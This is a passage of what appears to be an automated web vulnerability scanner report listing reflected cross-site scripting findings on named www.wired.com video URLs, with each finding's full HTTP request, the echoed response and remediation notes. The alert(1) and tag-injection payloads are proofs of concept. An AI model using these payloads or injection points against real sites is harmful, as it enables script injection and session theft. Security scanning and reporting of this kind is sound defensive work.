Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos1f6b3"-alert(1)-"04386ae1d6d/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 00:53:28 GMT
Date: Mon, 22 Nov 2010 00:48:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
xt/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "featured","explorers-of-light-from-canon--rodney-charters-acs-asc","1716500189","616369724001","latest-videos1f6b3"-alert(1)-"04386ae1d6d","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.922. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e120"><a>6ecc891057 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos1e120"><a>6ecc891057/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:37 GMT
Date: Mon, 22 Nov 2010 00:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos1e120"><a>6ecc891057 c_featured">
...[SNIP]...

1.923. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ac09"-alert(1)-"553b38f47a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured7ac09"-alert(1)-"553b38f47a7/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=296
Expires: Mon, 22 Nov 2010 00:54:40 GMT
Date: Mon, 22 Nov 2010 00:49:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "featured7ac09"-alert(1)-"553b38f47a7","latest-videos","explorers-of-light-from-canon--rodney-charters-acs-asc","1716500189","616369724001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.924. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb0d"><a>c42c591e361 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/featuredeeb0d"><a>c42c591e361/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:53:29 GMT
Date: Mon, 22 Nov 2010 00:48:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_featuredeeb0d"><a>c42c591e361">
...[SNIP]...

1.925. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4184d"-alert(1)-"2754dc14c34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured/17165001894184d"-alert(1)-"2754dc14c34/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:54:42 GMT
Date: Mon, 22 Nov 2010 00:49:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
xt/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","featured","explorers-of-light-from-canon--rodney-charters-acs-asc","616369724001","17165001894184d"-alert(1)-"2754dc14c34","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.926. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab7c3"-alert(1)-"1a65c8b335a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-ascab7c3"-alert(1)-"1a65c8b335a/616369724001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:55:14 GMT
Date: Mon, 22 Nov 2010 00:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","featured","explorers-of-light-from-canon--rodney-charters-acs-ascab7c3"-alert(1)-"1a65c8b335a","1716500189","616369724001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.927. http://www.wired.com/video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/616369724001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c18"-alert(1)-"5548a503785 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured/1716500189/explorers-of-light-from-canon--rodney-charters-acs-asc/61636972400183c18"-alert(1)-"5548a503785 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 00:55:27 GMT
Date: Mon, 22 Nov 2010 00:50:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "61636972400183c18"-alert(1)-"5548a503785","latest-videos","featured","explorers-of-light-from-canon--rodney-charters-acs-asc","1716500189","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.928. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e91c4--><script>alert(1)</script>46de8dac3cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoe91c4--><script>alert(1)</script>46de8dac3cf/latest-videos/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29452
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:21 GMT
Date: Mon, 22 Nov 2010 00:47:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoe91c4--><script>alert(1)</script>46de8dac3cf/latest-videos/featured/1716500189/into-the-unknown/672347081001
-->
...[SNIP]...

1.929. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae61a"><a>83daec0e404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoae61a"><a>83daec0e404/latest-videos/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29415
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:51:31 GMT
Date: Mon, 22 Nov 2010 00:46:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoae61a"><a>83daec0e404 ss_latest-videos c_featured">
...[SNIP]...

1.930. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d629"-alert(1)-"11ecc1b8d6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos8d629"-alert(1)-"11ecc1b8d6d/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:27 GMT
Date: Mon, 22 Nov 2010 00:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "672347081001","featured","into-the-unknown","latest-videos8d629"-alert(1)-"11ecc1b8d6d","1716500189","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.931. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf44"><a>5ff97d9d752 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos4cf44"><a>5ff97d9d752/featured/1716500189/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:52:25 GMT
Date: Mon, 22 Nov 2010 00:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos4cf44"><a>5ff97d9d752 c_featured">
...[SNIP]...

1.932. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5296d"-alert(1)-"e92a5e84c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured5296d"-alert(1)-"e92a5e84c9/1716500189/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:54:14 GMT
Date: Mon, 22 Nov 2010 00:49:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","672347081001","into-the-unknown","1716500189","featured5296d"-alert(1)-"e92a5e84c9","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.933. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1337f"><a>2a9641c5dbf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/featured1337f"><a>2a9641c5dbf/1716500189/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:53:43 GMT
Date: Mon, 22 Nov 2010 00:48:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_featured1337f"><a>2a9641c5dbf">
...[SNIP]...

1.934. http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/featured/1716500189/into-the-unknown/672347081001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f37b"-alert(1)-"7139282558d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/featured/17165001897f37b"-alert(1)-"7139282558d/into-the-unknown/672347081001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:53 GMT
Date: Mon, 22 Nov 2010 00:49:53 GMT
